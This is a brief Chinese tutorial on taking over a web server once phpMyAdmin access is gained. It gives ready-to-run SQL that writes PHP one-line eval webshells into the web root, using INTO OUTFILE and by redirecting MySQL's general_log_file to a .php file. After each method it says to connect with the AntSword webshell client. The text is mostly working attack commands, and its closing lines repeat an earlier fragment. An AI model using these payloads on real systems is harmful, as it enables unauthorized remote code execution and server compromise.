拿到 phpMyAdmin 如何获取权限

1. outfile 写一句话木马

尝试使用SQL注入写文件的方式，执行 outfile 语句写入一句话木马。

select "<?php @eval($_REQUEST[6868])?>"  into outfile "C:\\software\\phpstudy_pro\\WWW\\phpadmin.php";

蚁剑连接

2. general_log_file 写一句话木马

查看 general_log 是否开启。通过 show global variables like "%genera%"; 查看。

命令解析：查询全局系统变量中包含"genera"字符串的变量名及其对应的值。

• GLOBAL VARIABLES：表示查询全局系统变量。

执行 set global general_log="on"; 打开。

通过 generali_log_file 写入一句话木马。

set global general_log_file=“网站绝对路径/文件名”;

命令解析：用于设置全局系统变量 general_log_file 的值为指定的文件路径。

• general_log_file：表示需要修改的全局系统变量名称，它是MySQL数据库记录所有查询日志的文件名。
• 执行该命令后，MySQL数据库会将全局系统变量 general_log_file 的值设置为指定的文件路径。

SELECT "<?php @eval($_POST[1])?>"

general_log_file 会记录所有的查询语句，以原始的状态来显示，如果将 general_log 开关打开，general_log_file 设置为一个 php 文件，则查询的操作将会全部写入到 general_log_file 指定的文件，通过访问 general_log_file 指定的文件来获取 webshell。

使用蚁剑进行连接

general_log_file 指定的文件来获取 webshell。**

使用蚁剑进行连接